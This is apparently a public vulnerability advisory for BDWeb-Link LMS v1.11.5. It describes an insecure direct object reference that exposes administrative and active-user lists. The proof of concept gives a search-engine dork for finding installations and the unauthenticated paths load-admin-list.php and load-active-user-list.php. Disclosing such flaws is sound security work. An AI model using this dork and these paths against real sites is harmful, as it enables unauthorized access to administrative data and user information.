BDWeb-Link LMS version 1.11.5 suffers from an insecure direct object reference that allows users to access the administrative interface.
cbe0c3553ee75853516d659f6f557cd9eb41d8caa2ca9a849710a7ac8613d3f4====================================================================================================================================
| # Title : BDWeb-Link Lms v1.11.5 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://bdweblink.com |
| # Dork : Developed by Developed by BD Web Link |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use the payload to access the control panel and see the administration menu : load-admin-list.php or load-active-user-list.php
[+] https://127.0.0.1/bdweblink/load-active-user-list.php or https://127.0.0.1/bdweblink/load-admin-list.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================